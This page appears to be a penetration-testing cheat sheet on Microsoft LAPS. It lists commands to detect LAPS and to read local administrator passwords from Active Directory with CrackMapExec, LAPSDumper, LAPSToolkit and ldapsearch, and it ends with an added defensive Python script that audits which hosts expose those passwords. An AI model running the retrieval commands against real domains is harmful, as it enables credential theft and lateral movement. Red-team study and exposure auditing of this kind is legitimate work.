Microsoft LAPS (Local Administrator Password Solution) provides automated management of the local administrator account on every computer in Active Directory. The client-side component of LAPS on each computer generates a random, secure password and stores it in the computer object's `ms-Mcs-AdmPwd` attribute in AD. Because every machine ends up with a different local administrator password, this is considered secure and mitigates an attacker passing the local administrator hash throughout the domain.
```powershell
# Using the cmdlet Get-ADObject
Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=dc,DC=parzival,DC=com'
# Check if the DLL is installed locally
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
dir "C:\Program Files\LAPS\CSE"
# Checking registry
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
```

```bash
# Retrieve password using CrackMapExec
cme ldap $dc -u $username -p $password -M laps
# https://github.com/n00py/LAPSDumper
python laps.py -u $username -p $password -d $domain
```

```powershell
# https://github.com/leoloobeek/LAPSToolkit
Get-LAPSComputers
```

```bash
# Manually with LDAP
ldapsearch -x -h $host -D $user -w $password -b "dc=$domain,dc=com" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```
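The same LDAP query is useful to defenders as an exposure and coverage audit. The following is an added example, not code from the original page or from the tools listed above: it parses LDIF output for computer objects and reports which hosts returned `ms-Mcs-AdmPwd` to the querying account, which have no LAPS expiry set, and which are past expiry, without ever emitting the password. It assumes the query also requested `ms-Mcs-AdmPwdExpirationTime` over all computer objects and that the auditing account can read that attribute; the sample LDIF is constructed.

```python
import base64
from datetime import datetime, timedelta, timezone

# Constructed sample LDIF; host names and values are made up.
SAMPLE_LDIF = """\
dn: CN=WS01,OU=Workstations,DC=example,DC=com
ms-Mcs-AdmPwd: CONSTRUCTED-SAMPLE-VALUE
ms-Mcs-AdmPwdExpirationTime: 133485408000000000

dn: CN=WS02,OU=Workstations,DC=example,DC=com
ms-Mcs-AdmPwdExpirationTime: 132223104000000000

dn: CN=SRV01,OU=Servers,DC=example,DC=com
"""
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_dt(value):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)

def parse_ldif(text):
    """Return {dn: {attr_lower: value}}; handles folded lines and base64 ('::')."""
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    entries = {}
    for block in unfolded.split("\n\n"):
        attrs = {}
        for line in block.splitlines():
            if line.startswith("#") or ":" not in line:
                continue
            name, _, rest = line.partition(":")
            if rest.startswith(":"):  # "attr:: <base64>"
                value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
            else:
                value = rest.strip()
            attrs[name.lower()] = value
        if "dn" in attrs:  # skips ldapsearch trailer blocks (search:/result:)
            entries[attrs.pop("dn")] = attrs
    return entries

def audit(entries, now):
    """Classify each computer; the password value itself is never returned."""
    report = {"password_readable": [], "unmanaged": [], "expired": []}
    for dn, attrs in entries.items():
        if "ms-mcs-admpwd" in attrs:  # the querying account could read it
            report["password_readable"].append(dn)
        expiry = attrs.get("ms-mcs-admpwdexpirationtime")
        if expiry is None:  # LAPS never set a password on this host
            report["unmanaged"].append(dn)
        elif filetime_to_dt(expiry) < now:  # client is not rotating
            report["expired"].append(dn)
    return report
```

Any host under `password_readable` when the query ran as an account that is not a designated LAPS reader points to an over-permissive ACL on the attribute.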
{% embed url="https://adsecurity.org/?p=1790" %}